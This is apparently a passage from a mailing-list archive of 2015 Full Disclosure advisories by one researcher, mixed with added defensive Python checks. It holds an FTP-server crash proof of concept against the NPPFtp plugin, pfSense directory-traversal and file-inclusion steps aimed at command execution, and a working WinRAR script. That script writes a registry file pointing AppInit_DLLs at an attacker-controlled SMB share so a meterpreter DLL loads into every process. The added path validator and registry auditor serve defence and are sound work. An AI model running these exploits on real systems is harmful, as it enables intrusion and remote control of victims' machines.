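    def serve(self, client_ip: str, token: str, requested_path: str) -> Optional[bytes]:
        """Data-channel step: file bytes only for a matching, unused offer."""
        entry = self._pending.pop(token, None)   # one-time use
        if entry is None:
            return None                          # unsolicited request
        offered_client, offered_path = entry
        if offered_client != client_ip:
            return None                          # token presented by someone else
        try:
            if self._resolve(requested_path) != offered_path:
                return None                      # asks for a different file
        except ValueError:
            return None                          # traversal attempt
        with open(offered_path, "rb") as fh:
            return fh.read()


def demo() -> Dict[str, Optional[bytes]]:
    """Exercise the broker against a constructed export directory."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "notice.txt"), "wb") as fh:
        fh.write(b"welcome")
    broker = TransferBroker(root)
    token = broker.offer("10.0.0.5", "notice.txt")
    return {
        "solicited": broker.serve("10.0.0.5", token, "notice.txt"),
        "replay": broker.serve("10.0.0.5", token, "notice.txt"),
        "unsolicited": broker.serve("10.0.0.9", "deadbeef", "notice.txt"),
        "traversal": broker.serve("10.0.0.5",
                                  broker.offer("10.0.0.5", "notice.txt"),
                                  "../../etc/hosts"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print("%-12s -> %r" % (case, result))
```

Only the first, solicited request returns content; a replayed token, an unsolicited request and a traversal against a valid token all come back empty. The same check can be expressed as a detection rule: a connection to the data port with no preceding announcement from the server to that client is the signal the original server never looked for.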

[FD] Notepad ++ NPPFtp Plugin Buffer Overflow

2015-12-19 Thread Rio Sherri

# Title : Notepad ++ NPPFtp Plugin Buffer Overflow
# Date : 19/12/2015
# Author : R-73eN
# Tested on : NPPFtp 0.26.3 (Latest Version)
# Software : http://sourceforge.net/projects/nppftp/
# Vendor : https://notepad-plus-plus.org/
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
# A buffer overflow exists in the NPPftp plugin. When the plugin is connected to a malicious server
# which serves a crafted LIST response, the application crashes.
#
# How to reproduce
#
# 1. Start this python server
# 2. Open Notepad ++ , go to plugins , NPPFtp, Show windows
# 3. Click on the gear button to create a new connection.
# 4. Create the connection to connect to the server.
# 5. Connect and the application will crash.

import os,socket,threading,time
allow_delete = False
local_ip = "192.168.1.121"#socket.gethostbyname(socket.gethostname())
local_port = 21
currdir=os.path.abspath('.')

buff = "rwxrwxrwx   1 1 00" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5C
n6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0

[FD] PFSense <= 2.2.5 Directory Traversal

2015-12-18 Thread Rio Sherri

# Title : PFSense  <= 2.2.5 Directory Traversal
# Date : 18/12/2015
# Author : R-73eN
# Tested on : PFSense 2.2.5
# Software : https://github.com/pfsense/pfsense
# Vendor : https://pfsense.org/
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#
# Fix provided by the vendor: https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
#
#


In pfsense <= 2.2.5 (latest version), during a security audit I discovered the following vulnerabilities in the pfsense Webgui.

The following files are vulnerable to a file inclusion attack

wizard.php?xml=
pkg.php?xml=

Both of these files do not sanitize the path of the xml parameter and we can load xml files, and by loading a specially crafted xml file we can gain command execution.

Example:
1.xml (the filename can be whatever: .txt, .jpg etc. because it does not check for the file extension)

The content of the 1.xml should be:



12

1
LFI example 
Lfi example 
on
step1_submitphpaction();
/etc/passwd



The parameter  is passed to a require_once() function, which triggers the file inclusion attack.
As we all know, a file inclusion attack can be converted to RCE very easily.

Then visiting

http://vulnhost/wizard.php?xml=../../../1.xml

where the "xml" parameter is the path of the crafted file, will trigger the vulnerability.

Thanks
Rio Sherri
https://www.infogen.al/ - Infogen AL
___
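The defect above is a user-controlled path reaching require_once() unchecked. As an added example, not pfSense's code and not a description of the vendor's commit linked above, here is the shape of check an editor would expect in front of such a call, written in Python so it can be run stand-alone: reject any directory component before touching the filesystem, require the expected extension, then canonicalise and confirm the result is still a direct child of the intended directory. The directory path and the accepted file name are constructed for the example.

```python
import os

# Constructed directory for the example; pfSense's real wizard location is
# not asserted here.
WIZARD_DIR = "/usr/local/www/wizards"


def resolve_xml_name(user_value: str, base_dir: str = WIZARD_DIR) -> str:
    """Turn a user-supplied 'xml' parameter into an absolute path inside
    base_dir, or raise ValueError. Each test closes one way a path can be
    steered out of the directory."""
    if not user_value or "\x00" in user_value:
        raise ValueError("empty or NUL-containing name")
    # Reject any directory component, on either separator, before looking
    # at the filesystem; "." and ".." are directory components in disguise.
    if "/" in user_value or "\\" in user_value or user_value in (".", ".."):
        raise ValueError("directory components are not allowed")
    if not user_value.lower().endswith(".xml"):
        raise ValueError("only .xml files may be loaded")
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, user_value))
    # After canonicalisation the file must still sit directly in the wizard
    # directory; this also catches a symlink that points somewhere else.
    if os.path.dirname(full) != root:
        raise ValueError("resolved path is outside the wizard directory")
    return full


def check_many(values, base_dir: str = WIZARD_DIR) -> dict:
    """Map each candidate to True (accepted) or to the rejection reason."""
    results = {}
    for value in values:
        try:
            resolve_xml_name(value, base_dir)
            results[value] = True
        except ValueError as exc:
            results[value] = str(exc)
    return results


if __name__ == "__main__":
    samples = [
        "example_wizard.xml",   # constructed, well-formed name
        "../../../1.xml",       # the traversal form from the advisory
        "..\\..\\1.xml",        # same idea with the other separator
        "/tmp/1.xml",           # absolute path
        "1.txt",                # wrong extension
        "",                     # empty parameter
    ]
    for value, verdict in check_many(samples).items():
        print("%-22r -> %s" % (value, verdict))
```

Note what this check does not do: a plain "1.xml" with no directory component is accepted if such a file exists in the wizard directory, so the directory itself must not be writable by the web server process; otherwise the same inclusion is reachable through an upload rather than through traversal.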

[FD] GoAutoDial CE 3.3 Multiple SQL injections, Command Injection

2015-12-09 Thread Rio Sherri



goautodial
Description: Binary data

___

[FD] WinRar Settings Import Command Execution

2015-10-05 Thread Rio Sherri
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# Since Settings file of Winrar are saved as a registry file and WinRar executes
# it in an automatic way without checking if it is writing to the Registry keys
# used by winrar, we can create a specially crafted settings file and we can
# overwrite registry keys.
# Since we have access to registry there are various ways we could use this to
# get code execution such as defining "RUN" keys or creating new services etc
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#
#

banner = ""
banner +=" ___ __  _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_|\n\n"
print banner
print "[+] WinRar Settings Import Command Execution [+]\n"
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\","")
print "[+] Writing Content To Settings.reg [+]"
# REGEDIT5 text: the key written is outside WinRAR's own settings scope
evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:0001\n'
print evil
f = open("Settings.reg","w")
f.write(evil)
f.close()
print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"

___
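The advisory's timeline says the vendor patch verifies that an imported settings file stays under HKEY_CURRENT_USER\Software\WinRAR. As an added, defensive example (not WinRAR's code and not the page's), the following Python parses REGEDIT5 text the way an import routine or an endpoint control would need to before applying it: it lists every [key] section and its values, flags any key outside the WinRAR scope, any key deletion, and any AppInit_DLLs / LoadAppInit_DLLs value regardless of key. Both sample files are constructed for the example and the UNC share in the hostile one is a placeholder.

```python
import re
from typing import Dict, Iterator, List

# Keys a WinRAR settings import may legitimately touch (the scope the advisory
# says the vendor patch checks for). Matching is case-insensitive.
ALLOWED_KEY_PREFIXES = (r"HKEY_CURRENT_USER\Software\WinRAR",)

# Value names that configure DLL loading into every new process; their
# presence in a settings import is a finding whatever key they sit under.
SUSPICIOUS_VALUE_NAMES = ("appinit_dlls", "loadappinit_dlls")

KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _logical_lines(lines: List[str]) -> Iterator[str]:
    """Join hex(...) values that REGEDIT wraps with a trailing backslash."""
    buf = ""
    for raw in lines:
        line = raw.strip()
        if line.endswith("\\") and not KEY_RE.match(line):
            buf += line[:-1]
            continue
        yield buf + line
        buf = ""
    if buf:
        yield buf


def parse_reg(text: str) -> List[Dict]:
    """Minimal REGEDIT5 parser: one dict per [key] section, in file order."""
    lines = text.splitlines()
    if not lines or not lines[0].startswith("Windows Registry Editor Version"):
        raise ValueError("not a REGEDIT5 file")
    sections: List[Dict] = []
    current = None
    for line in _logical_lines(lines[1:]):
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = {"key": m.group(2), "delete": m.group(1) == "-", "values": []}
            sections.append(current)
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            current["values"].append((name, m.group(2)))
    return sections


def _in_scope(key: str) -> bool:
    k = key.lower()
    for prefix in ALLOWED_KEY_PREFIXES:
        p = prefix.lower()
        if k == p or k.startswith(p + "\\"):
            return True
    return False


def audit_reg(text: str) -> List[str]:
    """Return human-readable findings; an empty list means the file is in scope."""
    findings: List[str] = []
    for section in parse_reg(text):
        key = section["key"]
        if not _in_scope(key):
            findings.append("key outside WinRAR scope: " + key)
        if section["delete"]:
            findings.append("key deletion requested: " + key)
        for name, _raw in section["values"]:
            if name.lower() in SUSPICIOUS_VALUE_NAMES:
                findings.append("process-injection value %r under %s" % (name, key))
    return findings


# Constructed samples: a benign WinRAR-only export and one that reaches outside.
SAMPLE_BENIGN = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinRAR\Interface]
"ShowComment"=dword:00000001
"""

SAMPLE_HOSTILE = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinRAR\Interface]
"ShowComment"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="\\\\share-placeholder\\x.dll"
"LoadAppInit_DLLs"=dword:00000001
"""

if __name__ == "__main__":
    print("benign :", audit_reg(SAMPLE_BENIGN))
    print("hostile:", audit_reg(SAMPLE_HOSTILE))
```

The benign sample produces no findings; the hostile one produces three (the out-of-scope key and both AppInit values), which is the decision an import routine should make before a single key is written rather than after. The scope check is deliberately a prefix-with-separator test so that a key such as HKEY_CURRENT_USER\Software\WinRARx does not slip through.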